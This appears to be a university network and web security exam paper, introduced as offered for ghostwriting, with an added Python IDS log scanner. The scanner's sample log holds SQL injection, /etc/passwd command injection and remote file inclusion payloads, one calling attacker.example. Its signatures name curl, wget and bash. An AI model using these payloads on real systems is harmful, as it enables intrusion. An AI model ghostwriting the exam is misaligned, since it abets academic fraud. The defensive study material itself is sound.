
Network Security | COMP60015 NETWORK AND WEB SECURITY

This is a timed network and web security test from a UK university, offered here as a ghostwriting assignment.

1 Pentesting a server

a i) Briefly describe the SQL injection, Command injection and Remote file
inclusion vulnerabilities. Specify what capabilities each vulnerability
provides to an attacker when it is exploited on a given server.

ii) Suppose you are not allowed to access the code of a web application
deployed on a server. Explain how you could use an Intrusion Detection
System (IDS) to mitigate the 3 vulnerabilities from section (a.i). Discuss
specific limitations of this approach relevant to the vulnerabilities
considered here.

b You are tasked with a black-box pentesting exercise against cybersec.fun. The
rules of engagement specify that: you should not use automated tools; you
should not attempt to modify data on the server; you should not cause denial of
service on the server. The goal is to demonstrate access to a hidden database.

i) Gather information about cybersec.fun, and find the URL for a web page
that provides access to the hidden database. Report the flag that you see
displayed on that page. Briefly describe the steps taken.

ii) Use SQL injection to read the secret of the record with id = 331 from the
items table of the database. Report the secret value as a flag. Briefly
describe the steps taken.

iii) Find a way to login as database administrator, and report the flag you
discover when you manage to do so. Briefly describe the steps taken.

The two parts carry equal marks.

2 Attacks and defenses

a i) The file ssl-access.log contains web logs from a server. Identify 3
malicious entries. For each entry, describe the attack attempt and propose
the mitigation to be deployed in the server-side code of the web application
itself that you consider most effective and relevant, justifying your answer.
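For questions 1(a)(ii) and 2(a)(i), an added example that is not part of the exam paper: a small Python log scanner that applies one signature per vulnerability class from 1(a)(i) to access-log lines, and that also shows one limitation of signature-based IDS that the question asks about, since a single URL-decoding pass misses a double-encoded payload. The log lines, paths and signatures are constructed for illustration and are not from the ssl-access.log file the paper refers to.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (not the paper's ssl-access.log).
# Line 1 is benign; lines 2-4 carry one textbook payload each; line 5 is line 2
# double URL-encoded, which a single decoding pass will not normalise.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Mar/2024:10:00:02 +0000] "GET /item.php?id=1'%20OR%20'1'='1 HTTP/1.1" 200 812 "-" "curl/7.68"
10.0.0.7 - - [01/Mar/2024:10:00:03 +0000] "GET /ping.php?host=127.0.0.1;cat%20/etc/passwd HTTP/1.1" 200 90 "-" "curl/7.68"
10.0.0.8 - - [01/Mar/2024:10:00:04 +0000] "GET /index.php?page=http://attacker.example/shell.txt HTTP/1.1" 200 30 "-" "curl/7.68"
10.0.0.9 - - [01/Mar/2024:10:00:05 +0000] "GET /item.php?id=1%2527%2520OR%25201%253D1 HTTP/1.1" 200 812 "-" "curl/7.68"
"""

# Extract the request target ("/path?query") from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# One illustrative signature per class from 1(a)(i); matched on the decoded target.
SIGNATURES = {
    "sql_injection": re.compile(r"'\s*(or|and)\s+'?\d+'?\s*=|--\s*$|/\*|\bunion\s+select\b", re.I),
    "command_injection": re.compile(r"[;&|`]\s*(cat|ls|id|whoami|wget|curl|bash|sh)\b", re.I),
    "remote_file_inclusion": re.compile(r"[?&]\w+=(https?|ftp)://", re.I),
}


def decode_target(target, rounds=2):
    """URL-decode repeatedly (up to `rounds` passes) until the string stops changing."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_line(line, decode_rounds=2):
    """Return the first matching vulnerability class for a log line, or None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = decode_target(match.group("target"), decode_rounds)
    for name, signature in SIGNATURES.items():
        if signature.search(target):
            return name
    return None


def scan_log(text, decode_rounds=2):
    """Return [(line_number, class)] for every line that triggers a signature."""
    return [(n, v) for n, line in enumerate(text.splitlines(), 1)
            if (v := classify_line(line, decode_rounds))]
```

Running `scan_log(SAMPLE_LOG)` flags lines 2 to 5, while `scan_log(SAMPLE_LOG, decode_rounds=1)` misses line 5, which is the kind of encoding-evasion limitation an IDS deployed without access to the application code cannot fully close.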

b In this part you analyse malicious scripts and websites. These are realistic
examples but are designed not to cause any harm or other side effect to your
computer.

i) Download the obfuscated JavaScript malware sample jquery-v331.js.
Identify what kind of attack it is trying to perform, and report the flag you
discover in the process.

ii) You are tasked to analyse the malicious website nah.fun. The site uses the
browser of innocent visitors to attack a third party server. Analyse the
attack, with the goal of tricking the attacker into thinking that the attack
was successful. Report the 2 flags that you discover during this process,
and briefly describe the steps you have taken.

The two parts carry, respectively, 60% and 40% of the marks.
